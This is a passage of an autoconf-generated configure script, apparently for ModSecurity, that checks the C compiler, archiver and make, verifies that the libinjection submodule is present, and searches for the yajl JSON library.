ac_tool_warned=yes ;; esac CC=$ac_ct_CC fi fi fi test -z "$CC" && { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "no acceptable C compiler found in \$PATH See \`config.log' for more details" "$LINENO" 5; } # Provide some information about the compiler. $as_echo "$as_me:${as_lineno-$LINENO}: checking for C compiler version" >&5 set X $ac_compile ac_compiler=$2 for ac_option in --version -v -V -qversion; do { { ac_try="$ac_compiler $ac_option >&5" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_compiler $ac_option >&5") 2>conftest.err ac_status=$? if test -s conftest.err; then sed '10a\ ... rest of stderr output deleted ... 10q' conftest.err >conftest.er1 cat conftest.er1 >&5 fi rm -f conftest.er1 conftest.err $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } done { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C compiler" >&5 $as_echo_n "checking whether we are using the GNU C compiler... " >&6; } if ${ac_cv_c_compiler_gnu+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { #ifndef __GNUC__ choke me #endif ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : ac_compiler_gnu=yes else ac_compiler_gnu=no fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext ac_cv_c_compiler_gnu=$ac_compiler_gnu fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_compiler_gnu" >&5 $as_echo "$ac_cv_c_compiler_gnu" >&6; } if test $ac_compiler_gnu = yes; then GCC=yes else GCC= fi ac_test_CFLAGS=${CFLAGS+set} ac_save_CFLAGS=$CFLAGS { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC accepts -g" >&5 $as_echo_n "checking whether $CC accepts -g... " >&6; } if ${ac_cv_prog_cc_g+:} false; then : $as_echo_n "(cached) " >&6 else ac_save_c_werror_flag=$ac_c_werror_flag ac_c_werror_flag=yes ac_cv_prog_cc_g=no CFLAGS="-g" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : ac_cv_prog_cc_g=yes else CFLAGS="" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : else ac_c_werror_flag=$ac_save_c_werror_flag CFLAGS="-g" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : ac_cv_prog_cc_g=yes fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext ac_c_werror_flag=$ac_save_c_werror_flag fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_g" >&5 $as_echo "$ac_cv_prog_cc_g" >&6; } if test "$ac_test_CFLAGS" = set; then CFLAGS=$ac_save_CFLAGS elif test $ac_cv_prog_cc_g = yes; then if test "$GCC" = yes; then CFLAGS="-g -O2" else CFLAGS="-g" fi else if test "$GCC" = yes; then CFLAGS="-O2" else CFLAGS= fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $CC option to accept ISO C89" >&5 $as_echo_n "checking for $CC option to accept ISO C89... " >&6; } if ${ac_cv_prog_cc_c89+:} false; then : $as_echo_n "(cached) " >&6 else ac_cv_prog_cc_c89=no ac_save_CC=$CC cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include struct stat; /* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */ struct buf { int x; }; FILE * (*rcsopen) (struct buf *, struct stat *, int); static char *e (p, i) char **p; int i; { return p[i]; } static char *f (char * (*g) (char **, int), char **p, ...) { char *s; va_list v; va_start (v,p); s = g (p, va_arg (v,int)); va_end (v); return s; } /* OSF 4.0 Compaq cc is some sort of almost-ANSI by default. It has function prototypes and stuff, but not '\xHH' hex character constants. These don't provoke an error unfortunately, instead are silently treated as 'x'. The following induces an error, until -std is added to get proper ANSI mode. Curiously '\x00'!='x' always comes out true, for an array size at least. It's necessary to write '\x00'==0 to get something that's true only with -std. */ int osf4_cc_array ['\x00' == 0 ? 1 : -1]; /* IBM C 6 for AIX is almost-ANSI by default, but it replaces macro parameters inside strings and character constants. */ #define FOO(x) 'x' int xlc6_cc_array[FOO(a) == 'x' ? 1 : -1]; int test (int i, double x); struct s1 {int (*f) (int a);}; struct s2 {int (*f) (double a);}; int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int); int argc; char **argv; int main () { return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]; ; return 0; } _ACEOF for ac_arg in '' -qlanglvl=extc89 -qlanglvl=ansi -std \ -Ae "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" do CC="$ac_save_CC $ac_arg" if ac_fn_c_try_compile "$LINENO"; then : ac_cv_prog_cc_c89=$ac_arg fi rm -f core conftest.err conftest.$ac_objext test "x$ac_cv_prog_cc_c89" != "xno" && break done rm -f conftest.$ac_ext CC=$ac_save_CC fi # AC_CACHE_VAL case "x$ac_cv_prog_cc_c89" in x) { $as_echo "$as_me:${as_lineno-$LINENO}: result: none needed" >&5 $as_echo "none needed" >&6; } ;; xno) { $as_echo "$as_me:${as_lineno-$LINENO}: result: unsupported" >&5 $as_echo "unsupported" >&6; } ;; *) CC="$CC $ac_cv_prog_cc_c89" { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_c89" >&5 $as_echo "$ac_cv_prog_cc_c89" >&6; } ;; esac if test "x$ac_cv_prog_cc_c89" != xno; then : fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC understands -c and -o together" >&5 $as_echo_n "checking whether $CC understands -c and -o together... " >&6; } if ${am_cv_prog_cc_c_o+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF # Make sure it works both with $CC and with simple cc. # Following AC_PROG_CC_C_O, we do the test twice because some # compilers refuse to overwrite an existing .o file with -o, # though they will create one. am_cv_prog_cc_c_o=yes for am_i in 1 2; do if { echo "$as_me:$LINENO: $CC -c conftest.$ac_ext -o conftest2.$ac_objext" >&5 ($CC -c conftest.$ac_ext -o conftest2.$ac_objext) >&5 2>&5 ac_status=$? echo "$as_me:$LINENO: \$? = $ac_status" >&5 (exit $ac_status); } \ && test -f conftest2.$ac_objext; then : OK else am_cv_prog_cc_c_o=no break fi done rm -f core conftest* unset am_i fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_prog_cc_c_o" >&5 $as_echo "$am_cv_prog_cc_c_o" >&6; } if test "$am_cv_prog_cc_c_o" != yes; then # Losing compiler, so override with the script. # FIXME: It is wrong to rewrite CC. # But if we don't then we get into trouble of one sort or another. # A longer-term fix would be to have automake use am__CC in this case, # and then we could set am__CC="\$(top_srcdir)/compile \$(CC)" CC="$am_aux_dir/compile $CC" fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu depcc="$CC" am_compiler_list= { $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 $as_echo_n "checking dependency style of $depcc... " >&6; } if ${am_cv_CC_dependencies_compiler_type+:} false; then : $as_echo_n "(cached) " >&6 else if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then # We make a subdir and do the tests there. Otherwise we can end up # making bogus files that we don't know about and never remove. For # instance it was reported that on HP-UX the gcc test will end up # making a dummy file named 'D' -- because '-MD' means "put the output # in D". rm -rf conftest.dir mkdir conftest.dir # Copy depcomp to subdir because otherwise we won't find it if we're # using a relative directory. cp "$am_depcomp" conftest.dir cd conftest.dir # We will build objects and dependencies in a subdirectory because # it helps to detect inapplicable dependency modes. For instance # both Tru64's cc and ICC support -MD to output dependencies as a # side effect of compilation, but ICC will put the dependencies in # the current directory while Tru64 will put them in the object # directory. mkdir sub am_cv_CC_dependencies_compiler_type=none if test "$am_compiler_list" = ""; then am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` fi am__universal=false case " $depcc " in #( *\ -arch\ *\ -arch\ *) am__universal=true ;; esac for depmode in $am_compiler_list; do # Setup a source with many dependencies, because some compilers # like to wrap large dependency lists on column 80 (with \), and # we should not choose a depcomp mode which is confused by this. # # We need to recreate these files for each test, as the compiler may # overwrite some of them when testing with obscure command lines. # This happens at least with the AIX C compiler. : > sub/conftest.c for i in 1 2 3 4 5 6; do echo '#include "conftst'$i'.h"' >> sub/conftest.c # Using ": > sub/conftst$i.h" creates only sub/conftst1.h with # Solaris 10 /bin/sh. echo '/* dummy */' > sub/conftst$i.h done echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf # We check with '-c' and '-o' for the sake of the "dashmstdout" # mode. It turns out that the SunPro C++ compiler does not properly # handle '-M -o', and we need to detect this. Also, some Intel # versions had trouble with output in subdirs. am__obj=sub/conftest.${OBJEXT-o} am__minus_obj="-o $am__obj" case $depmode in gcc) # This depmode causes a compiler race in universal mode. test "$am__universal" = false || continue ;; nosideeffect) # After this tag, mechanisms are not by side-effect, so they'll # only be used when explicitly requested. if test "x$enable_dependency_tracking" = xyes; then continue else break fi ;; msvc7 | msvc7msys | msvisualcpp | msvcmsys) # This compiler won't grok '-c -o', but also, the minuso test has # not run yet. These depmodes are late enough in the game, and # so weak that their functioning should not be impacted. am__obj=conftest.${OBJEXT-o} am__minus_obj= ;; none) break ;; esac if depmode=$depmode \ source=sub/conftest.c object=$am__obj \ depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ >/dev/null 2>conftest.err && grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && grep $am__obj sub/conftest.Po > /dev/null 2>&1 && ${MAKE-make} -s -f confmf > /dev/null 2>&1; then # icc doesn't choke on unknown options, it will just issue warnings # or remarks (even with -Werror). So we grep stderr for any message # that says an option was ignored or not supported. # When given -MP, icc 7.0 and 7.1 complain thusly: # icc: Command line warning: ignoring option '-M'; no argument required # The diagnosis changed in icc 8.0: # icc: Command line remark: option '-MP' not supported if (grep 'ignoring option' conftest.err || grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else am_cv_CC_dependencies_compiler_type=$depmode break fi fi done cd .. rm -rf conftest.dir else am_cv_CC_dependencies_compiler_type=none fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CC_dependencies_compiler_type" >&5 $as_echo "$am_cv_CC_dependencies_compiler_type" >&6; } CCDEPMODE=depmode=$am_cv_CC_dependencies_compiler_type if test "x$enable_dependency_tracking" != xno \ && test "$am_cv_CC_dependencies_compiler_type" = gcc3; then am__fastdepCC_TRUE= am__fastdepCC_FALSE='#' else am__fastdepCC_TRUE='#' am__fastdepCC_FALSE= fi if test -n "$ac_tool_prefix"; then for ac_prog in ar lib "link -lib" do # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. set dummy $ac_tool_prefix$ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_AR+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$AR"; then ac_cv_prog_AR="$AR" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_AR="$ac_tool_prefix$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi AR=$ac_cv_prog_AR if test -n "$AR"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $AR" >&5 $as_echo "$AR" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$AR" && break done fi if test -z "$AR"; then ac_ct_AR=$AR for ac_prog in ar lib "link -lib" do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_AR+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_AR"; then ac_cv_prog_ac_ct_AR="$ac_ct_AR" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_AR="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_AR=$ac_cv_prog_ac_ct_AR if test -n "$ac_ct_AR"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_AR" >&5 $as_echo "$ac_ct_AR" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$ac_ct_AR" && break done if test "x$ac_ct_AR" = x; then AR="false" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac AR=$ac_ct_AR fi fi : ${AR=ar} { $as_echo "$as_me:${as_lineno-$LINENO}: checking the archiver ($AR) interface" >&5 $as_echo_n "checking the archiver ($AR) interface... " >&6; } if ${am_cv_ar_interface+:} false; then : $as_echo_n "(cached) " >&6 else ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu am_cv_ar_interface=ar cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int some_variable = 0; _ACEOF if ac_fn_c_try_compile "$LINENO"; then : am_ar_try='$AR cru libconftest.a conftest.$ac_objext >&5' { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$am_ar_try\""; } >&5 (eval $am_ar_try) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } if test "$ac_status" -eq 0; then am_cv_ar_interface=ar else am_ar_try='$AR -NOLOGO -OUT:conftest.lib conftest.$ac_objext >&5' { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$am_ar_try\""; } >&5 (eval $am_ar_try) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } if test "$ac_status" -eq 0; then am_cv_ar_interface=lib else am_cv_ar_interface=unknown fi fi rm -f conftest.lib libconftest.a fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_ar_interface" >&5 $as_echo "$am_cv_ar_interface" >&6; } case $am_cv_ar_interface in ar) ;; lib) # Microsoft lib, so override with the ar-lib wrapper script. # FIXME: It is wrong to rewrite AR. # But if we don't then we get into trouble of one sort or another. # A longer-term fix would be to have automake use am__AR in this case, # and then we could set am__AR="$am_aux_dir/ar-lib \$(AR)" or something # similar. AR="$am_aux_dir/ar-lib $AR" ;; unknown) as_fn_error $? "could not determine $AR interface" "$LINENO" 5 ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 $as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } set x ${MAKE-make} ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` if eval \${ac_cv_prog_make_${ac_make}_set+:} false; then : $as_echo_n "(cached) " >&6 else cat >conftest.make <<\_ACEOF SHELL = /bin/sh all: @echo '@@@%%%=$(MAKE)=@@@%%%' _ACEOF # GNU make sometimes prints "make[1]: Entering ...", which would confuse us. case `${MAKE-make} -f conftest.make 2>/dev/null` in *@@@%%%=?*=@@@%%%*) eval ac_cv_prog_make_${ac_make}_set=yes;; *) eval ac_cv_prog_make_${ac_make}_set=no;; esac rm -f conftest.make fi if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } SET_MAKE= else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } SET_MAKE="MAKE=${MAKE-make}" fi # Check if the compiler is c++11 compatible. # AX_CXX_COMPILE_STDCXX_11(,mandatory) # Check for libinjection if ! test -f "others/libinjection/src/libinjection_html5.c"; then as_fn_error $? "\ libInjection was not found within ModSecurity source directory. libInjection code is available as part of ModSecurity source code in a format of a git-submodule. git-submodule allow us to specify the correct version of libInjection and still uses the libInjection repository to download it. You can download libInjection using git: $ git submodule init $ git submodule update " "$LINENO" 5 fi # Libinjection version # SecLang test version # Check for yajl if test "x$ac_cv_env_PKG_CONFIG_set" != "xset"; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}pkg-config", so it can be a program name with args. set dummy ${ac_tool_prefix}pkg-config; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_PKG_CONFIG+:} false; then : $as_echo_n "(cached) " >&6 else case $PKG_CONFIG in [\\/]* | ?:[\\/]*) ac_cv_path_PKG_CONFIG="$PKG_CONFIG" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_PKG_CONFIG="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi PKG_CONFIG=$ac_cv_path_PKG_CONFIG if test -n "$PKG_CONFIG"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $PKG_CONFIG" >&5 $as_echo "$PKG_CONFIG" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_PKG_CONFIG"; then ac_pt_PKG_CONFIG=$PKG_CONFIG # Extract the first word of "pkg-config", so it can be a program name with args. set dummy pkg-config; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_PKG_CONFIG+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_PKG_CONFIG in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_PKG_CONFIG="$ac_pt_PKG_CONFIG" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_PKG_CONFIG="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_PKG_CONFIG=$ac_cv_path_ac_pt_PKG_CONFIG if test -n "$ac_pt_PKG_CONFIG"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_PKG_CONFIG" >&5 $as_echo "$ac_pt_PKG_CONFIG" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_PKG_CONFIG" = x; then PKG_CONFIG="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac PKG_CONFIG=$ac_pt_PKG_CONFIG fi else PKG_CONFIG="$ac_cv_path_PKG_CONFIG" fi fi if test -n "$PKG_CONFIG"; then _pkg_min_version=0.9.0 { $as_echo "$as_me:${as_lineno-$LINENO}: checking pkg-config is at least version $_pkg_min_version" >&5 $as_echo_n "checking pkg-config is at least version $_pkg_min_version... " >&6; } if $PKG_CONFIG --atleast-pkgconfig-version $_pkg_min_version; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } PKG_CONFIG="" fi fi # Needed if pkg-config will be used. # Possible names for the yajl library/package (pkg-config) YAJL_POSSIBLE_LIB_NAMES="yajl2 yajl" # Possible extensions for the library YAJL_POSSIBLE_EXTENSIONS="so la sl dll dylib" # Possible paths (if pkg-config was not found, proceed with the file lookup) YAJL_POSSIBLE_PATHS="/usr/lib /usr/local/lib /usr/local/libyajl /usr/local/yajl /usr/local /opt/libyajl /opt/yajl /opt /usr /usr/lib64" # Variables to be set by this very own script. YAJL_VERSION="" YAJL_CFLAGS="" YAJL_CPPFLAGS="" YAJL_LDADD="" YAJL_LDFLAGS="" # Check whether --with-yajl was given. if test "${with_yajl+set}" = set; then : withval=$with_yajl; fi if test "x${with_yajl}" == "xno"; then $as_echo "#define HAVE_GEOIP 0" >>confdefs.h { $as_echo "$as_me:${as_lineno-$LINENO}: Support for GeoIP was disabled by the utilization of --without-yajl or --with-yajl=no" >&5 $as_echo "$as_me: Support for GeoIP was disabled by the utilization of --without-yajl or --with-yajl=no" >&6;} YAJL_DISABLED=yes else if test "x${with_yajl}" == "xyes"; then YAJL_MANDATORY=yes { $as_echo "$as_me:${as_lineno-$LINENO}: GeoIP support was marked as mandatory by the utilization of --with-yajl=yes" >&5 $as_echo "$as_me: GeoIP support was marked as mandatory by the utilization of --with-yajl=yes" >&6;} fi # for x in ${YAJL_POSSIBLE_LIB_NAMES}; do # CHECK_FOR_YAJL_AT(${x}) # if test -n "${YAJL_VERSION}"; then # break # fi # done # if test "x${with_yajl}" != "xyes" or test "x${with_yajl}" == "xyes"; then if test "x${with_yajl}" == "x" || test "x${with_yajl}" == "xyes"; then # Nothing about GeoIP was informed, using the pkg-config to figure things out. if test -n "${PKG_CONFIG}"; then YAJL_PKG_NAME="" for x in ${YAJL_POSSIBLE_LIB_NAMES}; do if ${PKG_CONFIG} --exists ${x}; then YAJL_PKG_NAME="$x" break fi done fi { $as_echo "$as_me:${as_lineno-$LINENO}: Nothing about GeoIP was informed during the configure phase. Trying to detect it on the platform..." >&5 $as_echo "$as_me: Nothing about GeoIP was informed during the configure phase. Trying to detect it on the platform..." >&6;} if test -n "${YAJL_PKG_NAME}"; then # Package was found using the pkg-config scripts YAJL_VERSION="`${PKG_CONFIG} ${YAJL_PKG_NAME} --modversion`" YAJL_CFLAGS="`${PKG_CONFIG} ${YAJL_PKG_NAME} --cflags`" YAJL_LDADD="`${PKG_CONFIG} ${YAJL_PKG_NAME} --libs-only-l`" YAJL_LDFLAGS="`${PKG_CONFIG} ${YAJL_PKG_NAME} --libs-only-L --libs-only-other`" YAJL_DISPLAY="${YAJL_LDADD}, ${YAJL_CFLAGS}" else # If pkg-config did not find anything useful, go over file lookup. for x in ${YAJL_POSSIBLE_LIB_NAMES}; do path=${x} for y in ${YAJL_POSSIBLE_EXTENSIONS}; do for z in ${YAJL_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then yajl_lib_path="${path}/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then yajl_lib_path="${path}/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then yajl_lib_path="${path}/lib/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then yajl_lib_path="${path}/lib/x86_64-linux-gnu/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/lib${z}.${y}" break fi done if test -n "$yajl_lib_path"; then break fi done if test -e "${path}/include/yajl_parse.h"; then yajl_inc_path="${path}/include" elif test -e "${path}/yajl_parse.h"; then yajl_inc_path="${path}" elif test -e "${path}/include/yajl/yajl_parse.h"; then yajl_inc_path="${path}/include" fi if test -n "${yajl_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: YAJL library found at: ${yajl_lib_file}" >&5 $as_echo "$as_me: YAJL library found at: ${yajl_lib_file}" >&6;} fi if test -n "${yajl_inc_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: YAJL headers found at: ${yajl_inc_path}" >&5 $as_echo "$as_me: YAJL headers found at: ${yajl_inc_path}" >&6;} fi if test -n "${yajl_lib_path}" -a -n "${yajl_inc_path}"; then # TODO: Compile a piece of code to check the version. YAJL_CFLAGS="-I${yajl_inc_path}" YAJL_LDADD="-l${yajl_lib_name}" YAJL_LDFLAGS="-L${yajl_lib_path}" YAJL_DISPLAY="${yajl_lib_file}, ${yajl_inc_path}" fi if test -n "${YAJL_VERSION}"; then break fi done fi fi if test "x${with_yajl}" != "x"; then # An specific path was informed, lets check. YAJL_MANDATORY=yes path=${with_yajl} for y in ${YAJL_POSSIBLE_EXTENSIONS}; do for z in ${YAJL_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then yajl_lib_path="${path}/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then yajl_lib_path="${path}/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then yajl_lib_path="${path}/lib/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then yajl_lib_path="${path}/lib/x86_64-linux-gnu/" yajl_lib_name="${z}" yajl_lib_file="${yajl_lib_path}/lib${z}.${y}" break fi done if test -n "$yajl_lib_path"; then break fi done if test -e "${path}/include/yajl_parse.h"; then yajl_inc_path="${path}/include" elif test -e "${path}/yajl_parse.h"; then yajl_inc_path="${path}" elif test -e "${path}/include/yajl/yajl_parse.h"; then yajl_inc_path="${path}/include" fi if test -n "${yajl_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: YAJL library found at: ${yajl_lib_file}" >&5 $as_echo "$as_me: YAJL library found at: ${yajl_lib_file}" >&6;} fi if test -n "${yajl_inc_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: YAJL headers found at: ${yajl_inc_path}" >&5 $as_echo "$as_me: YAJL headers found at: ${yajl_inc_path}" >&6;} fi if test -n "${yajl_lib_path}" -a -n "${yajl_inc_path}"; then # TODO: Compile a piece of code to check the version. YAJL_CFLAGS="-I${yajl_inc_path}" YAJL_LDADD="-l${yajl_lib_name}" YAJL_LDFLAGS="-L${yajl_lib_path}" YAJL_DISPLAY="${yajl_lib_file}, ${yajl_inc_path}" fi fi # fi fi if test -z "${YAJL_LDADD}"; then if 